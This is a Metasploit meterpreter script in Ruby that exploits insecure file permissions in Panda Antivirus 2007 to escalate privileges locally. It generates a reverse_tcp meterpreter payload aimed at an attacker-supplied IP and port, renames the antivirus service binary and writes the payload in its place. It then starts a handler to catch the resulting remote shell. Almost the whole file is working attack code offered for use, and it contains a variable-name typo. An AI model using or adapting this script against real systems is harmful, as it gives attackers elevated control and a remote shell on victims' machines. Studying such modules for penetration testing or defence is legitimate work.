##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to imporve this script, please try to port it as a post
# module instead. Thank you.
##



##
# Panda Antivirus 2007 Local Privilege Escalation
# This module exploits a privilege escalation vulnerability in
# Panda Antivirus 2007. Due to insecure permission issues, a
# local attacker can gain elevated privileges.
#
# This script has only been tested against Panda Antivirus 2007.
#
# BID - 4257
# mc[@]metasploit.com
##

#
# Options
#
@exec_opts = Rex::Parser::Arguments.new(
  "-h"  => [ false,  "This help menu"],
  "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
  "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
)

#
# Default parameters
#
rhost = nil
rport = nil

def usage
  print_status("Panda Antivirus 2007 Privilege Escalation.")
  print_line(@exec_opts.usage)
  raise Rex::Script::Completed
end

#
# Option parsing
#
@exec_opts.parse(args) do |opt, idx, val|
  case opt
    when "-r"
      rhost = val
    when "-p"
      rport = val.to_i
    else
      usage
    end
end

if rhost.nil? or rport.nil?
  usage
elsif client.platform =~ /win32|win64/
  client.sys.process.get_processes().each do |m|

    if ( m['name'] =~ /PAVSRV51\.EXE/ )
      print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

      # Build out the exe payload.
      pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
      pay.datastore['LHOST'] = rhost
      pay.datastore['LPORT'] = rport
      raw  = pay.generate

      exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

      # Change to our working directory.
      workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
      client.fs.dir.chdir(workindir)

      # Create a backup of the original exe.
      print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
      client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})

      # Place our newly created exe with the orginal binary name.
      tempexe = workingdir + "PAVSRV51.EXE"

      print_status("Sending EXE payload '#{tempexe}'.")
      fd = client.fs.file.new(tempexe, "wb")
      fd.write(exe)
      fd.close

      print_status("Done, now just wait for the callback...")

      # Our handler to recieve the callback.
      handler = client.framework.exploits.create("multi/handler")
      handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
      handler.datastore['LHOST']   = rhost
      handler.datastore['LPORT']   = rport
      # Keep our shell stable.
      handler.datastore['InitialAutoRunScript'] = "migrate -f"
      handler.datastore['ExitOnSession'] = false

      handler.exploit_simple(
        'Payload'        => handler.datastore['PAYLOAD'],
        'RunAsJob'       => true
      )
    end
  end
else
  print_error("This version of Meterpreter is not supported with this script!")
  raise Rex::Script::Completed
end